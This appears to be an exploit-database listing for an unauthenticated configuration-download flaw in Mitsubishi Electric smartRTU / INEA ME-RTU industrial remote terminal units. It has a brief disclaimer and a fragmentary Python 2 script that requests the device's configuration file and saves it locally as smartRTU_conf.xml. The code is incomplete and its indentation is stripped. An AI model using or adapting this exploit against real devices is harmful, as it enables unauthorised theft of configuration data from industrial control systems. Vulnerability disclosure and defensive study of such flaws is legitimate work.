Exploits / Vulnerability Discovered : 2019-08-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Mitsubishi electric smartrtu / inea mertu unauthenticated configuration download is for educational purposes only and if it is used you will do on your own risk!
print "[+] Attempting to download smartRTU configuration file"
r = requests.get(url)
if r.status_code == 200:
print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
with open('smartRTU_conf.xml', 'w') as f:
f.write(r.content)
Mitsubishi electric smartrtu / inea mertu unauthenticated configuration download